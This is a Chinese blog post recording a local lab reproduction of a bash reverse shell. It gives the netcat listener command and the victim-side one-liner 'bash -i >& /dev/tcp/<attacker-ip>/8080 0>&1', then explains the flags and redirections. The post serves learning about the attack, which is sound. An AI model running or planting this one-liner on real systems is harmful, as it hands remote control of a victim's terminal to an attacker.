bash反弹shell
part1:不求甚解的本地复现
攻击端Debian 10.x: 192.168.208.134
受害端Ubuntu : 192.168.208.135
攻击端打开(监听)某端口:
键入命令:【nc -lvp 8080】
受害端执行反弹shell:
键入命令:【bash -i >& /dev/tcp/192.168.208.134/8080 0>&1】
效果:
可以在攻击机上操作受害机的终端。
part2:尝试理解原理
(1) nc -lvp 8080
-l 设置netcat处于监听状态等待连接。
-v 显示错误提示信息(非必须)
-p 设置本地监听的端口号
(2) bash -i >& dev/tcp/192.168.208.134/8080 0>&1
-i 创建一个交互式的shell.
0,stdin,标准输入(一般是键盘)
1,stdout,标准输出(一般是显示屏,准确的说是用户终端控制台)
2,stderr,标准错误(出错信息输出)
> 输出重定向;指定具体的输出目标以替换默认的标准输出。
eg:
>&:将联合符号前面的内容与后面相结合然后一起重定向给后者。
dev/tcp/192.168.208.134/8080(dev/tcp/ip/port):linux里一切皆文件;这个东西也看做文件(但不能访问),其作用是让本机与目标主机通过指定端口建立tcp连接。
整体解读的话,就是:
bash产生了一个交互环境与本地主机主动发起与目标主机8080端口建立的连接(即TCP 8080 会话连接)相结合,并重定向给tcp 8080会话连接;(这个具体咋回事估计得等再学点东西才能理解)
用户键盘输入与用户标准输出相结合,并重定向给一个标准的输出;(这就是效果图中ls出现两次的原因;第二次是因为标准输入也被重定向给了标准输出,输出出来了)
即得到一个bash 反弹环境。
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】博客园社区专享云产品让利特惠,阿里云新客6.5折上折
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 没有源码,如何修改代码逻辑?
· 一个奇形怪状的面试题:Bean中的CHM要不要加volatile?
· [.NET]调用本地 Deepseek 模型
· 一个费力不讨好的项目,让我损失了近一半的绩效!
· .NET Core 托管堆内存泄露/CPU异常的常见思路
· DeepSeek “源神”启动!「GitHub 热点速览」
· 微软正式发布.NET 10 Preview 1:开启下一代开发框架新篇章
· C# 集成 DeepSeek 模型实现 AI 私有化(本地部署与 API 调用教程)
· DeepSeek R1 简明指南:架构、训练、本地部署及硬件要求
· NetPad:一个.NET开源、跨平台的C#编辑器